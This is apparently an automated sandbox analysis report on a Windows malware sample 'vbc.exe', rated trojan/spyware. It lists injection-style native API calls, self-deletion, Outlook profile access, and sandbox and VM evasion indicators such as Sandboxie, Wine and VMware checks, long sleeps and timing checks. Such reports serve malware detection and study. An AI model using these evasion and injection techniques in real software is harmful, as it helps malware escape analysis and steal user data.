Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_0166FA2B 6_2_0166FA2B
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01674AEF 6_2_01674AEF
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_016822AE 6_2_016822AE
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01681D55 6_2_01681D55
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01682D07 6_2_01682D07
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015B0D20 6_2_015B0D20
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_016825DD 6_2_016825DD
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015CD5E0 6_2_015CD5E0
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015E2581 6_2_015E2581
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01672D82 6_2_01672D82
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_0167D466 6_2_0167D466
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015C841F 6_2_015C841F
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01674496 6_2_01674496
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01681FF1 6_2_01681FF1
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_0168DFCE 6_2_0168DFCE
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015D6E30 6_2_015D6E30
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_0167D616 6_2_0167D616
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01682EF7 6_2_01682EF7
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\vbc.exe Code function: String function: 015BB150 appears 133 times
Contains functionality to call native functions
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 6_2_015F9910
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F99A0 NtCreateSection,LdrInitializeThunk, 6_2_015F99A0
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9840 NtDelayExecution,LdrInitializeThunk, 6_2_015F9840
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9860 NtQuerySystemInformation,LdrInitializeThunk, 6_2_015F9860
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F98F0 NtReadVirtualMemory,LdrInitializeThunk, 6_2_015F98F0
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9A50 NtCreateFile,LdrInitializeThunk, 6_2_015F9A50
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9A00 NtProtectVirtualMemory,LdrInitializeThunk, 6_2_015F9A00
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9A20 NtResumeThread,LdrInitializeThunk, 6_2_015F9A20
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9540 NtReadFile,LdrInitializeThunk, 6_2_015F9540
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F95D0 NtClose,LdrInitializeThunk, 6_2_015F95D0
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9710 NtQueryInformationToken,LdrInitializeThunk, 6_2_015F9710
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9FE0 NtCreateMutant,LdrInitializeThunk, 6_2_015F9FE0
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9780 NtMapViewOfSection,LdrInitializeThunk, 6_2_015F9780
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F97A0 NtUnmapViewOfSection,LdrInitializeThunk, 6_2_015F97A0
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9660 NtAllocateVirtualMemory,LdrInitializeThunk, 6_2_015F9660
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F96E0 NtFreeVirtualMemory,LdrInitializeThunk, 6_2_015F96E0
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9950 NtQueueApcThread, 6_2_015F9950
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F99D0 NtCreateProcessEx, 6_2_015F99D0
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015FB040 NtSuspendThread, 6_2_015FB040
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9820 NtEnumerateKey, 6_2_015F9820
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F98A0 NtWriteVirtualMemory, 6_2_015F98A0
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9B00 NtSetValueKey, 6_2_015F9B00
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015FA3B0 NtGetContextThread, 6_2_015FA3B0
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9A10 NtQuerySection, 6_2_015F9A10
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9A80 NtOpenDirectoryObject, 6_2_015F9A80
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9560 NtWriteFile, 6_2_015F9560
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015FAD30 NtSetContextThread, 6_2_015FAD30
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9520 NtWaitForSingleObject, 6_2_015F9520
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F95F0 NtQueryInformationFile, 6_2_015F95F0
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015FA770 NtOpenThread, 6_2_015FA770
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9770 NtSetInformationFile, 6_2_015F9770
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9760 NtOpenProcess, 6_2_015F9760
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015FA710 NtOpenProcessToken, 6_2_015FA710
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9730 NtQueryVirtualMemory, 6_2_015F9730
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9650 NtQueryValueKey, 6_2_015F9650
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9670 NtQueryInformationProcess, 6_2_015F9670
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9610 NtEnumerateValueKey, 6_2_015F9610
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F96D0 NtCreateKey, 6_2_015F96D0
Sample file is different than original file name gathered from version info
Source: vbc.exe, 00000000.00000002.407071082.00000000028F3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameWebName.dll4 vs vbc.exe
Source: vbc.exe, 00000000.00000002.415770591.0000000006E80000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameKeysNormalize.dll4 vs vbc.exe
Source: vbc.exe, 00000000.00000000.362679786.00000000004D2000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameSegm.exeB vs vbc.exe
Source: vbc.exe, 00000000.00000002.415918626.0000000006EC0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameWebName.dll4 vs vbc.exe
Source: vbc.exe, 00000000.00000002.409203550.000000000397B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameDoncepre.dll@ vs vbc.exe
Source: vbc.exe, 00000000.00000002.416361250.0000000007010000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameDoncepre.dll@ vs vbc.exe
Source: vbc.exe, 00000006.00000003.407195484.0000000001513000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs vbc.exe
Source: vbc.exe, 00000006.00000003.404813945.0000000001373000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs vbc.exe
Source: vbc.exe, 00000006.00000002.500864587.00000000016AF000.00000040.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs vbc.exe
Source: vbc.exe Binary or memory string: OriginalFilenameSegm.exeB vs vbc.exe
Source: vbc.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: vbc.exe ReversingLabs: Detection: 31%
Source: vbc.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\vbc.exe "C:\Users\user\Desktop\vbc.exe"
Source: C:\Users\user\Desktop\vbc.exe Process created: C:\Users\user\Desktop\vbc.exe C:\Users\user\Desktop\vbc.exe
Source: C:\Users\user\Desktop\vbc.exe Process created: C:\Users\user\Desktop\vbc.exe C:\Users\user\Desktop\vbc.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
Source: C:\Users\user\Desktop\vbc.exe Process created: C:\Users\user\Desktop\vbc.exe C:\Users\user\Desktop\vbc.exe Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Process created: C:\Users\user\Desktop\vbc.exe C:\Users\user\Desktop\vbc.exe Jump to behavior
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\vbc.exe.log Jump to behavior
Source: C:\Windows\SysWOW64\control.exe File created: C:\Users\user\AppData\Local\Temp\4-9E1JJI Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@6/2@4/3
Source: vbc.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\vbc.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: vbc.exe, ProcExpGUI/Form1.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 0.0.vbc.exe.4d0000.0.unpack, ProcExpGUI/Form1.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: vbc.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: vbc.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: wntdll.pdbUGP source: vbc.exe, 00000006.00000003.406454999.00000000013F4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000003.404197199.000000000125D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000003.497959345.0000000004ADC000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000002.644322679.0000000004F2F000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000003.500502722.0000000004C79000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000002.642912671.0000000004E10000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000006.00000003.406454999.00000000013F4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000003.404197199.000000000125D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000003.497959345.0000000004ADC000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000002.644322679.0000000004F2F000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000003.500502722.0000000004C79000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000002.642912671.0000000004E10000.00000040.00000800.00020000.00000000.sdmp

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: vbc.exe, ProcExpGUI/Form1.cs .Net Code: WaitHandle System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 0.0.vbc.exe.4d0000.0.unpack, ProcExpGUI/Form1.cs .Net Code: WaitHandle System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_0160D0D1 push ecx; ret 6_2_0160D0E4
Source: initial sample Static PE information: section name: .text entropy: 7.777091407724558

Hooking and other Techniques for Hiding and Protection
barindex
Deletes itself after installation
Source: C:\Windows\SysWOW64\control.exe File deleted: c:\users\user\desktop\vbc.exe Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: 00000000.00000002.408488225.0000000002B1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.407071082.00000000028F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 6088, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: vbc.exe, 00000000.00000002.408488225.0000000002B1D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000000.00000002.407071082.00000000028F3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Source: vbc.exe, 00000000.00000002.408488225.0000000002B1D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000000.00000002.407071082.00000000028F3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\vbc.exe TID: 3304 Thread sleep time: -45877s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe TID: 2700 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\control.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01685BA5 rdtsc 6_2_01685BA5
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\vbc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\vbc.exe API coverage: 4.4 %
Source: C:\Users\user\Desktop\vbc.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Thread delayed: delay time: 45877 Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: vbc.exe, 00000000.00000002.407071082.00000000028F3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000007.00000000.480995882.0000000007FBD000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: vbc.exe, 00000000.00000002.407071082.00000000028F3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
Source: explorer.exe, 00000007.00000000.480995882.0000000007FBD000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}d
Source: explorer.exe, 00000007.00000000.430054457.000000000807C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000007.00000000.430054457.000000000807C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000I
Source: explorer.exe, 00000007.00000000.471787867.0000000000778000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _VMware_SATA_CD00#5&
Source: explorer.exe, 00000007.00000000.430054457.000000000807C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000007.00000000.473972364.00000000042EE000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}q^
Source: vbc.exe, 00000000.00000002.407071082.00000000028F3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware SVGA II
Source: explorer.exe, 00000007.00000000.536669391.00000000042A0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000O
Source: vbc.exe, 00000000.00000002.407071082.00000000028F3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01685BA5 rdtsc 6_2_01685BA5
Enables debug privileges
Source: C:\Users\user\Desktop\vbc.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015DB944 mov eax, dword ptr fs:[00000030h] 6_2_015DB944
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015DB944 mov eax, dword ptr fs:[00000030h] 6_2_015DB944
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015BB171 mov eax, dword ptr fs:[00000030h] 6_2_015BB171
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015BB171 mov eax, dword ptr fs:[00000030h] 6_2_015BB171
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015BC962 mov eax, dword ptr fs:[00000030h] 6_2_015BC962
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015B9100 mov eax, dword ptr fs:[00000030h] 6_2_015B9100
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015B9100 mov eax, dword ptr fs:[00000030h] 6_2_015B9100
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015B9100 mov eax, dword ptr fs:[00000030h] 6_2_015B9100
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015E513A mov eax, dword ptr fs:[00000030h] 6_2_015E513A
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015E513A mov eax, dword ptr fs:[00000030h] 6_2_015E513A
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015D4120 mov eax, dword ptr fs:[00000030h] 6_2_015D4120
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015D4120 mov eax, dword ptr fs:[00000030h] 6_2_015D4120
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015D4120 mov eax, dword ptr fs:[00000030h] 6_2_015D4120
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015D4120 mov eax, dword ptr fs:[00000030h] 6_2_015D4120
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015D4120 mov ecx, dword ptr fs:[00000030h] 6_2_015D4120
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_016441E8 mov eax, dword ptr fs:[00000030h] 6_2_016441E8
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015BB1E1 mov eax, dword ptr fs:[00000030h] 6_2_015BB1E1
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015BB1E1 mov eax, dword ptr fs:[00000030h] 6_2_015BB1E1
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015BB1E1 mov eax, dword ptr fs:[00000030h] 6_2_015BB1E1
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_016749A4 mov eax, dword ptr fs:[00000030h] 6_2_016749A4
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_016749A4 mov eax, dword ptr fs:[00000030h] 6_2_016749A4
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_016749A4 mov eax, dword ptr fs:[00000030h] 6_2_016749A4
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_016749A4 mov eax, dword ptr fs:[00000030h] 6_2_016749A4
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_016369A6 mov eax, dword ptr fs:[00000030h] 6_2_016369A6
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015E2990 mov eax, dword ptr fs:[00000030h] 6_2_015E2990
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015EA185 mov eax, dword ptr fs:[00000030h] 6_2_015EA185
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_016351BE mov eax, dword ptr fs:[00000030h] 6_2_016351BE
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_016351BE mov eax, dword ptr fs:[00000030h] 6_2_016351BE
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_016351BE mov eax, dword ptr fs:[00000030h] 6_2_016351BE
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_016351BE mov eax, dword ptr fs:[00000030h] 6_2_016351BE
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015DC182 mov eax, dword ptr fs:[00000030h] 6_2_015DC182
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015D99BF mov ecx, dword ptr fs:[00000030h] 6_2_015D99BF
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015D99BF mov ecx, dword ptr fs:[00000030h] 6_2_015D99BF
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015D99BF mov eax, dword ptr fs:[00000030h] 6_2_015D99BF
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015D99BF mov ecx, dword ptr fs:[00000030h] 6_2_015D99BF
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015D99BF mov ecx, dword ptr fs:[00000030h] 6_2_015D99BF
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015D99BF mov eax, dword ptr fs:[00000030h] 6_2_015D99BF
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015D99BF mov ecx, dword ptr fs:[00000030h] 6_2_015D99BF
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015D99BF mov ecx, dword ptr fs:[00000030h] 6_2_015D99BF
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015D99BF mov eax, dword ptr fs:[00000030h] 6_2_015D99BF
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015D99BF mov ecx, dword ptr fs:[00000030h] 6_2_015D99BF
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015D99BF mov ecx, dword ptr fs:[00000030h] 6_2_015D99BF
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015D99BF mov eax, dword ptr fs:[00000030h] 6_2_015D99BF
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015E61A0 mov eax, dword ptr fs:[00000030h] 6_2_015E61A0
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015E61A0 mov eax, dword ptr fs:[00000030h] 6_2_015E61A0
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015D0050 mov eax, dword ptr fs:[00000030h] 6_2_015D0050
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015D0050 mov eax, dword ptr fs:[00000030h] 6_2_015D0050
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01672073 mov eax, dword ptr fs:[00000030h] 6_2_01672073
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01681074 mov eax, dword ptr fs:[00000030h] 6_2_01681074
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015DA830 mov eax, dword ptr fs:[00000030h] 6_2_015DA830
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015DA830 mov eax, dword ptr fs:[00000030h] 6_2_015DA830
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015DA830 mov eax, dword ptr fs:[00000030h] 6_2_015DA830
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015DA830 mov eax, dword ptr fs:[00000030h] 6_2_015DA830
